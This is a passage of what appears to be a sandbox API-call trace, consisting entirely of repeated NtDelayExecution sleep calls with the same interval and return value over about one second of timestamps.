(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.428] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.431] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.439] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.471] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.472] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.488] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.490] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.494] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.497] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.503] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.504] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.506] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.516] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.519] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.526] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.538] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.541] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.544] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.547] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.553] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.554] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.556] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.557] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.564] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.567] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.570] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.573] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.576] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.585] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.596] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.598] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.599] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.618] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.621] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.622] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.626] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.629] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.632] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.636] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.638] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.639] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.641] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.642] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.650] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.659] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.665] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.667] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.669] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.671] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.672] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.674] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.676] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.679] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.697] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.700] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.707] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.715] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.716] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.720] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.722] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.724] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.725] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.727] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.728] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.733] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.734] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.736] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.737] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.739] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.742] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.743] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.746] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.750] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.752] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.753] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.755] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.756] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.758] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.759] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.762] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.764] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.765] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.767] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.769] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.770] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.772] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.773] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.775] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.776] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.778] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.782] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.783] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.785] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.786] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.788] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.789] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.791] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.795] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.796] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.798] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.799] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.801] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.802] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.804] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.805] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.807] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.814] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.815] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.817] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.818] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.820] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.821] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.823] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.824] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.826] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.827] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.829] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.835] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.836] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.838] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.839] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.841] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.842] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.847] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.849] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.850] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.852] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.853] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.855] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.856] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.858] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.859] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.862] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.864] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.865] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.867] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.869] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.871] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.872] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.874] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.875] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.877] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.881] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.883] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.884] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.886] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.887] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.889] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.890] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.893] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.895] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.896] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.898] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.899] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.901] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.902] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.904] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.905] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.907] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.910] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.916] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.918] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.920] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.921] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.923] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.924] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.926] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.927] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.929] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.932] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.933] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.935] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.936] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.938] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.939] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.941] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.943] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.946] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.948] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.953] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.954] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.956] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.957] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.959] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.962] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.964] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.965] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.967] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.969] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.970] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.972] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.973] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.980] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.982] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.983] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.985] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.990] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.991] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.996] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.997] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0136.999] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.002] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.003] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.005] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.006] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.015] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.017] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.019] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.028] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.029] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.032] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.034] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.035] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.037] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.038] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.040] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.041] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.044] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.047] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0137.048] NtDelayExecution 